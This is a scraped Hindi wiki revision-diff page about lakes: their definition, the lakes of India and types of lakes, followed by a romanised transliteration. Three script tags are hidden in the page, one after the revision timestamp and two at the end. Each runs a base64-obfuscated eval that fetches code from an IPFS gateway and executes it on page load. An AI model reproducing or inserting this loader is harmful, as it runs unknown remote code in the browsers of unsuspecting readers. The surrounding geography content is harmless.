Difference between revisions of "झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "अर्थात " to "अर्थात् ")
 
(6 intermediate revisions by 5 users not shown)
Line 1: Line 1:
 
{{tocright}}
 
{{tocright}}
 +
[[चित्र:Mussoorie-Lake.jpg|thumb|250px|[[मसूरी झील]], [[उत्तराखंड]]]]
 
'''झील''' [[जल]] का वह स्थिर भाग है जो चारों तरफ से स्थलखंडों से घिरा होता है। झील की दूसरी विशेषता उसका स्थायित्व है। सामान्य रूप से झील भूतल के वे विस्तृत गड्ढे हैं जिनमें जल भरा होता है। झीलों का जल प्रायः स्थिर होता है। झीलों की एक महत्त्वपूर्ण विशेषता उनका खारापन होता है लेकिन अनेक झीलें मीठे पानी की भी होती हैं। झीलें भूपटल के किसी भी भाग पर हो सकती हैं। ये उच्च [[पर्वत|पर्वतों]] पर मिलती हैं, [[पठार|पठारों]] और मैदानों पर भी मिलती हैं तथा स्थल पर [[सागर]] तल से नीचे भी पाई जाती हैं।
 
'''झील''' [[जल]] का वह स्थिर भाग है जो चारों तरफ से स्थलखंडों से घिरा होता है। झील की दूसरी विशेषता उसका स्थायित्व है। सामान्य रूप से झील भूतल के वे विस्तृत गड्ढे हैं जिनमें जल भरा होता है। झीलों का जल प्रायः स्थिर होता है। झीलों की एक महत्त्वपूर्ण विशेषता उनका खारापन होता है लेकिन अनेक झीलें मीठे पानी की भी होती हैं। झीलें भूपटल के किसी भी भाग पर हो सकती हैं। ये उच्च [[पर्वत|पर्वतों]] पर मिलती हैं, [[पठार|पठारों]] और मैदानों पर भी मिलती हैं तथा स्थल पर [[सागर]] तल से नीचे भी पाई जाती हैं।
  
 
==भारत की झीलें==
 
==भारत की झीलें==
देश की अधिकांश झीलों की स्थिति उत्तर के पर्वतीय पर्वतीय प्रदेश में ही सीमित है। समुद्र तटीय क्षेत्रों में भी कुछ महत्वपूर्ण झीलें स्थित हैं। मैदानी भाग में इनकी कमी है। महाद्वीपों के मध्यवर्ती भाग अर्थात धरातल पर उपस्थित जलपूर्ण भागों को झील कहते हैं। झीलों की सबसे बड़ी विशेषता उनका स्थल से घिरा होना है।   
+
देश की अधिकांश झीलों की स्थिति उत्तर के पर्वतीय पर्वतीय प्रदेश में ही सीमित है। समुद्र तटीय क्षेत्रों में भी कुछ महत्त्वपूर्ण झीलें स्थित हैं। मैदानी भाग में इनकी कमी है। महाद्वीपों के मध्यवर्ती भाग अर्थात् धरातल पर उपस्थित जलपूर्ण भागों को झील कहते हैं। झीलों की सबसे बड़ी विशेषता उनका स्थल से घिरा होना है।   
 
==विभिन्न प्रकार की झीलें==
 
==विभिन्न प्रकार की झीलें==
 
#विवर्तनिक झीलें - भूभर्गिक हलचलों के कारण निर्मित झीलों को विवर्तनिक झीलों के अंतर्गत रखा जाता है। [[कश्मीर]] की [[वूलर झील]] तथा [[कुमायूँ]] [[हिमालय]] में स्थित अनेक झीलें ।
 
#विवर्तनिक झीलें - भूभर्गिक हलचलों के कारण निर्मित झीलों को विवर्तनिक झीलों के अंतर्गत रखा जाता है। [[कश्मीर]] की [[वूलर झील]] तथा [[कुमायूँ]] [[हिमालय]] में स्थित अनेक झीलें ।
Line 12: Line 13:
 
#भ्रंशन द्वारा बनी झीलें- भूगर्भिक हलचलों के कारण धरातल के किसी भाग के नीचे धंस जाने या ऊपर उठ जाने से बनी बेसिनों में जल भर जाने के परिणामस्वरूप ऐसी झीलों का निर्माण होता है।
 
#भ्रंशन द्वारा बनी झीलें- भूगर्भिक हलचलों के कारण धरातल के किसी भाग के नीचे धंस जाने या ऊपर उठ जाने से बनी बेसिनों में जल भर जाने के परिणामस्वरूप ऐसी झीलों का निर्माण होता है।
 
#दरार घाटी झीलें- धरातल की दो समानांतर दरारों के मध्यवर्ती भाग के नीचे धंस जाने एवं उसमें जल भर जाने के फलस्वरूप ऐसी झीलों का निर्माण होता है। इजरायल का [[मृत सागर]] इसका उदहारण है।
 
#दरार घाटी झीलें- धरातल की दो समानांतर दरारों के मध्यवर्ती भाग के नीचे धंस जाने एवं उसमें जल भर जाने के फलस्वरूप ऐसी झीलों का निर्माण होता है। इजरायल का [[मृत सागर]] इसका उदहारण है।
#खारे पानी की झीलें- जिन झीलों में बाहर से पानी आकर मिलता तो है किन्तु नकिलकर बाहर नहीं जाता है, वे प्रायः खारी झीलें होती हैं। कैस्पियन सागर विश्व की सबसे बड़ी खारे पानी की झील है।
+
#खारे पानी की झीलें- जिन झीलों में बाहर से पानी आकर मिलता तो है किन्तु नकिलकर बाहर नहीं जाता है, वे प्रायः खारी झीलें होती हैं। [[कैस्पियन सागर]] विश्व की सबसे बड़ी खारे पानी की झील है।
  
 
==अन्य प्रमुख झीलें==
 
==अन्य प्रमुख झीलें==
[[डल झील]], मानसबल, शेषनाग, अनन्तनाग, गन्धारवल, अच्छाबल, बैरीनाग तथा नागिन झील ([[जम्मू-कश्मीर]]), उदयसागर, [[पिछोला झील|पिछोला]], [[फ़तह सागर झील|फ़तह सागर]], जयसमन्द, [[राजसमन्द झील|राजसमन्द]] ([[उदयपुर]]), [[लोकटक झील|लोकटक]] ([[मणिपुर]]), [[वेम्बानद झील|वेम्बानद]] ([[केरल]]), [[हुसैन सागर झील|हुसैनसागर]] (आन्ध्र प्रदेश) आदि।  
+
[[डल झील]], [[मानसबल झील|मानसबल]], [[शेषनाग झील|शेषनाग]], अनन्तनाग, गन्धारवल, अच्छाबल, बैरीनाग तथा [[नागिन झील]] ([[जम्मू-कश्मीर]]), उदयसागर, [[पिछोला झील|पिछोला]], [[फ़तह सागर झील|फ़तह सागर]], जयसमन्द, [[राजसमन्द झील|राजसमन्द]] ([[उदयपुर]]), [[लोकटक झील|लोकटक]] ([[मणिपुर]]), [[वेम्बानद झील|वेम्बानद]] ([[केरल]]), [[हुसैन सागर झील|हुसैनसागर]] (आन्ध्र प्रदेश) आदि।  
 
 
 
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
Line 25: Line 26:
 
}}
 
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भारत की झीलें}}
+
{{भारत की झीलें}}{{भूगोल शब्दावली}}
[[Category:भारत की झीलें]][[Category:भूगोल कोश]]
+
[[Category:भूगोल शब्दावली]][[Category:भारत की झीलें]][[Category:भूगोल कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:49, 7 November 2017

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

[[chitr:Mussoorie-Lake.jpg|thumb|250px|masoori jhil, uttarakhand]] jhil jal ka vah sthir bhag hai jo charoan taraph se sthalakhandoan se ghira hota hai. jhil ki doosari visheshata usaka sthayitv hai. samany roop se jhil bhootal ke ve vistrit gaddhe haian jinamean jal bhara hota hai. jhiloan ka jal prayah sthir hota hai. jhiloan ki ek mahattvapoorn visheshata unaka kharapan hota hai lekin anek jhilean mithe pani ki bhi hoti haian. jhilean bhoopatal ke kisi bhi bhag par ho sakati haian. ye uchch parvatoan par milati haian, patharoan aur maidanoan par bhi milati haian tatha sthal par sagar tal se niche bhi paee jati haian.

bharat ki jhilean

desh ki adhikaansh jhiloan ki sthiti uttar ke parvatiy parvatiy pradesh mean hi simit hai. samudr tatiy kshetroan mean bhi kuchh mahattvapoorn jhilean sthit haian. maidani bhag mean inaki kami hai. mahadvipoan ke madhyavarti bhag arthath dharatal par upasthit jalapoorn bhagoan ko jhil kahate haian. jhiloan ki sabase b di visheshata unaka sthal se ghira hona hai.

vibhinn prakar ki jhilean

  1. vivartanik jhilean - bhoobhargik halachaloan ke karan nirmit jhiloan ko vivartanik jhiloan ke aantargat rakha jata hai. kashmir ki voolar jhil tatha kumayooan himalay mean sthit anek jhilean .
  2. kretar jhil ya jvalamukhi kriya se nirmit jhil - shaant jvalamukhiyoan ke vrihadakar mukhoan ya kretaroan mean jal bhar jane se aisi jhiloan ki utpatti hoti hai. isaka pramukh udaharan maharashtr ke buladhana zile ki lonar jhil aur aphrika ki viktoriya jhil hai.
  3. laigoon ya anoop jhilean - chilka jhil (u disa), pulikat jhil (aandhr pradesh), koleroo jhil (aandhr pradesh)
  4. himani dvara nirmit jhilean - taje ya mithe pani ki jhilean jinamean nadiyoan ke madhyam se nirantar taje jal ka pravah hota rahata hai mithe pani ki jhilean hoti haian kyoanki inamean vibhinn prakar ke lavanoan ka jamav nahian hone pata hai. kumayooan himalay ki adhikaansh jhilean isi prakar ki haian. inake udaharan haian - rakasatal, nainital, satatal, bhimatal, naukuchiya tal, khurapatal, samatal, poonatal, malavatal adi.
  5. vayu dvara nirmit jhilean - rajasthan ki saanbhar, didavana, panchabhadra, loonakaranasar adi.
  6. bhranshan dvara bani jhilean- bhoogarbhik halachaloan ke karan dharatal ke kisi bhag ke niche dhans jane ya oopar uth jane se bani besinoan mean jal bhar jane ke parinamasvaroop aisi jhiloan ka nirman hota hai.
  7. darar ghati jhilean- dharatal ki do samanaantar dararoan ke madhyavarti bhag ke niche dhans jane evan usamean jal bhar jane ke phalasvaroop aisi jhiloan ka nirman hota hai. ijarayal ka mrit sagar isaka udaharan hai.
  8. khare pani ki jhilean- jin jhiloan mean bahar se pani akar milata to hai kintu nakilakar bahar nahian jata hai, ve prayah khari jhilean hoti haian. kaispiyan sagar vishv ki sabase b di khare pani ki jhil hai.

any pramukh jhilean

dal jhil, manasabal, sheshanag, anantanag, gandharaval, achchhabal, bairinag tatha nagin jhil (jammoo-kashmir), udayasagar, pichhola, fatah sagar, jayasamand, rajasamand (udayapur), lokatak (manipur), vembanad (keral), husainasagar (andhr pradesh) adi.  

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>